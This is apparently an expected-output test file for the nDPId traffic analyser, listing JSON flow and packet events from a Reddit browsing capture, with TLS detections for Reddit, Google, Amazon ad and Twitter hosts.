-00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686301,"flow_last_seen":1605291686301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686301,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605291686301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686301,"pkt":"qtsDr8lk5EKm5WPyht1gDu9XACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RIBuyQ3ML0AAAAAoAL9IDDZAAACBAWgBAIICql05vEAAAAAAQMDBw=="} 
-00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605291686327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686327,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdEkHBFWUkNzC+oBJXgILuAAACBAV4AQMDAwQCCArC1zmoqXTm8Q=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1605291686327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686327,"pkt":"qtsDr8lk5EKm5WPyht1gDu9XACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RIBuyQ3ML5BwRVmgBAB+wbmAAABAQgKqXTnC8LXOag="} -00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1211,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686301,"flow_last_seen":1605291686327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686327,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1398,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686301,"flow_last_seen":1605291686419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686419,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01318{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686301,"flow_last_seen":1605291686420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686420,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","server_names":"*.thumbs.redditmedia.com,thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.thumbs.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:F4:6C:CF:D6:FD:64:3E:50:17:A2:DE:B0:F2:B6:9B:76:59:C6:75"}} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1925,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686985,"flow_last_seen":1605291686985,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686985,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1925,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1605291686985,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686985,"pkt":"qtsDr8lk5EKm5WPyht1gAMi0ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxxABu7duD88AAAAAoAL9IJsfAAACBAWgBAIIClRf4AwAAAAAAQMDBw=="} 
-00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1926,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686985,"flow_last_seen":1605291686985,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686985,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1926,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1605291686985,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686985,"pkt":"qtsDr8lk5EKm5WPyht1gDjDtACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAN+SHGqeQBu3kB4hEAAAAAoAL9ICE+AAACBAWgBAIICkv6YkkAAAAAAQMDBw=="} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1927,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686996,"flow_last_seen":1605291686996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686996,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1927,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1605291686996,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686996,"pkt":"qtsDr8lk5EKm5WPyht1gCh2fACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7O2lbABu20FmjEAAAAAoAL9ILJdAAACBAWgBAIICnOjJUYAAAAAAQMDBw=="} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1928,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1605291687016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687016,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvHENPm6q63bg\/QoBJXgIMUAAACBAV4AQMDAwQCCArC1zxZVF\/gDA=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1929,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1605291687016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687016,"pkt":"qtsDr8lk5EKm5WPyht1gAMi0ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxxABu7duD9DT5uqvgBAB+wcHAAABAQgKVF\/gK8LXPFk="} 
-00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1930,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687016,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687016,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1931,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687024,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGhTs7YqAcsBIEmLB5kd7IUo3\/YpAbuVsAnf\/VJtBZoyoBJXgFGuAAACBAV4AQMDAwQCCArC1zxhc6MlRg=="} 
-00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1932,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687024,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAA35IcYqAcsBIEmLB5kd7IUo3\/YpAbup5BqPq4R5AeISoBJXgAGtAAACBAV4AQMDAwQCCArC1zxhS\/piSQ=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1933,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687024,"pkt":"qtsDr8lk5EKm5WPyht1gCh2fACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7O2lbABu20FmjIJ3\/1TgBAB+9WjAAABAQgKc6MlYsLXPGE="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1934,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687024,"pkt":"qtsDr8lk5EKm5WPyht1gDjDtACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAN+SHGqeQBu3kB4hIaj6uFgBAB+4WXAAABAQgKS\/picMLXPGE="} 
-00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1935,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686996,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1936,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1938,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291687060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00991{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1949,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687075,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686996,"flow_last_seen":1605291687096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687096,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2333,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687485,"flow_last_seen":1605291687485,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687485,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2333,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1605291687485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687485,"pkt":"qtsDr8lk5EKm5WPyht1gDGJhACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACs2RLCx1IBu5\/PXZ4AAAAAoAL9IP2VAAACBAWgBAIICruOxrcAAAAAAQMDBw=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2341,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1605291687512,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687512,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAKzZEsIqAcsBIEmLB5kd7IUo3\/YpAbvHUvrRnoyfz12foBJXgAjWAAACBAV4AQMDAwQCCArC1z5Fu47Gtw=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2342,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1605291687513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687513,"pkt":"qtsDr8lk5EKm5WPyht1gDGJhACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACs2RLCx1IBu5\/PXZ\/60Z6NgBAB+4zMAAABAQgKu47G0sLXPkU="} 
-00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2343,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687485,"flow_last_seen":1605291687513,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687513,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687514,"flow_last_seen":1605291687514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687514,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1605291687514,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687514,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2N5MAAAAAoAL9IOSoAAACBAWgBAIICiRA7pIAAAAAAQMDBw=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2351,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1605291687545,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687545,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleJ0qAcsBIEmLB5kd7IUo3\/YpAbu8cGxxKx0ItjeUoBJXgPGUAAACBAV4AQMDAwQCCArC1z5pJEDukg=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1605291687545,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687545,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2N5RscSsegBAB+3WHAAABAQgKJEDuscLXPmk="} 
-00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687514,"flow_last_seen":1605291687545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687545,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01011{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2356,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687485,"flow_last_seen":1605291687552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
